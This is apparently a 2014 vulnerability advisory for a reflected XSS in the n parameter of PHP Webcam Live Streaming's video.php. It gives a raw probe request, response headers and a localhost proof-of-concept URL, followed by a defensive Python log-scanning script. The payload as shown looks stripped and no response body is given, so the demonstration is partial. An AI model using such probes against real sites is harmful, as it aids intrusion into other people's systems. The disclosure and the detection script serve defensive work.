[+] Author: TUNISIAN CYBER
[+] Exploit Title: PHP Webcam Live Streaming XSS Vulnerability
[+] Date: 07-02-2014
[+] Category: WebApp
[+] Google Dork: :
[+] Tested on: KaliLinux
[+] Vendor: http://sourceforge.net/projects/phplivestream/
[+] Friendly Sites: na3il.com,th3-creative.com
###############################################################

+Description:
VideoWhisper Live Streaming provides web based live video streaming (from webcam or similar sources).

Live Streaming key features:
+ 1 to many 1 way video streaming
+ Live chat for viewers
+ User list with online participants
+ Channel title
+ HTML embed code to publish video channel
+ P2P group streaming support
+ Session timer and control with scripts
+ 100% web based for clients

The PHP edition is the easiest choice to set up and run the Live Streaming application on a website. It is also the way to integrate with any PHP script or content management system that does not yet have a ready-made integration.

PHP Live Streaming Edition Highlights:
+ Create Live Video Channels
+ Broadcast Live Video from Browser
+ Share Channels Link/Embed Code
+ Limit Total Use Time by Channel
+ Simple Setup
+ Easy to Install
+ Full PHP Source Code
+ Easy to Integrate

+Exploit:
PHP Webcam Live Streaming suffers from an XSS vulnerability: the value of the n parameter of video.php is reflected in the response.

+HTTP Header:
Request:
GET /ls_php/video.php?n=Studio195prompt(956046) HTTP/1.1
Referer: http://127.0.0.1:80/ls_php/
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Response:
HTTP/1.1 200 OK
Date: Fri, 07 Feb 2014 20:48:26 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 900
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

+PoC: (Localtest)
127.O.O.1 /ls_php/video.php?n=Studio195prompt(956046)
http://oi62.tinypic.com/f3tc89.jpg
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members: DamaneDz UzunDz GEOIX
########################################################################################
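
Added example (not part of the original advisory and not the vendor's code): a log triage script that flags requests to video.php whose n parameter, after repeated percent-decoding, falls outside a channel-name allowlist. The allowlist, the function names and the sample access-log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: legitimate channel names use only these characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")
# Request field of an Apache common/combined log line: "METHOD target PROTO"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.*?) HTTP/[\d.]+"')

# Constructed sample lines; only the second request value comes from the advisory.
SAMPLE_LOG = [
    '127.0.0.1 - - [07/Feb/2014:20:48:20 +0000] "GET /ls_php/video.php?n=Studio195 HTTP/1.1" 200 870',
    '127.0.0.1 - - [07/Feb/2014:20:48:26 +0000] "GET /ls_php/video.php?n=Studio195prompt(956046) HTTP/1.1" 200 900',
    '127.0.0.1 - - [07/Feb/2014:20:49:02 +0000] "GET /ls_php/video.php?n=Studio195%2528x%2529 HTTP/1.1" 200 880',
    '127.0.0.1 - - [07/Feb/2014:20:49:10 +0000] "GET /ls_php/index.php HTTP/1.1" 200 512',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is inspected in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_channel_requests(log_lines, script="/video.php"):
    """Return (line_number, decoded n value) for requests to the script whose
    n parameter does not match the assumed channel-name allowlist."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith(script):
            continue
        # parse_qs decodes once; fully_decode peels any further layers.
        for raw in parse_qs(target.query, keep_blank_values=True).get("n", []):
            value = fully_decode(raw)
            if not SAFE_NAME.fullmatch(value):
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_channel_requests(SAMPLE_LOG):
        print(f"line {number}: unexpected n value {value!r}")
```

The same allowlist can be enforced in the application before the value is written into the page, with HTML output encoding as the second layer.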